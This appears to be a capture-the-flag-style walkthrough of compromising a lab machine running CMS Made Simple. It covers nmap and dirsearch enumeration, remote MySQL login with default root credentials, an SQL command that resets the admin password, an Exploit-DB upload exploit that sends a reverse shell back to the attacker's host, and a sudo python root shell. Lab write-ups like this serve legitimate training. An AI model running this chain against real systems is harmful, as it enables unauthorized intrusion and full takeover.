pg-my-cmsms-play

My-CMSMS

Nmap
sudo nmap 192.168.152.74 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
3306/tcp open mysql MySQL 8.0.19
33060/tcp open mysqlx?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking out port 80 takes us to the default page for CMS made simple.

I then run dirsearch.py against the host which also discovered phpmyadmin which was locked behind http-basic-auth.

python3 dirsearch.py -u http://192.168.152.74 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 –full-url

I attempted to bruteforce the login for phpmyadmin and for CMSMS login. I was unable to find any valid credentials for either.

I was however, able to login to MySQL remotely with the credentials root:root.

mysql -u root -p -h 192.168.152.74

From here we can view the databases and move into the cmsms_db database.

use cmsms_db;
show tables;

Looking at the tables that exists in the database we select all columns from cms_users table.

select * from cms_users;

This reveals a MD5 password hash for the admin account. I was unable to crack this with several word lists however.

As we are the root account on MySQL we can instead change the password to something we know and use this to login to CMSMS.

Run the following command to create a new password of ‘weakpass’ for the admin user:

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'weakpass'))) where username = 'admin'

The password has now changed:

We can then move over to the /admin/ directory in the browser and login with the new credentials.

Searching for exploits on CMSMS now that we are authenticated gives a few results.

As we are running version 2.2.13 I will try the Arbitary file upload for version 2.2.14.

CMS Made Simple 2.2.14 – Arbitrary File Upload (Authenticated)
CMS Made Simple 2.2.14 – Arbitrary File Upload (Authenticated).. webapps exploit for PHP platform
www.exploit-db.com

Once the python script was downloaded I executed with the following syntax:

python3 48779.py –url http://192.168.152.74/admin/login.php -u admin -p weakpass -lhost 192.168.49.152 -l 80

When ready I set a netcat listener and prompted the script to continue resulting in a shell as www-data.

Moving around the target machine we have a .htpasswd file hidden in /var/www/html/admin/. When running cat on the file we get the value TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=.

From here we can decode with base64 then base32 as this string is double encoded.

We can then use su to switch to the armour account and login with the password we have discovered.

Checking sudo -l shows we can run python as root without declaring a password.

We can then spawn a root shell with python.

sudo python -c ‘import os; os.system(“/bin/sh”)’
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *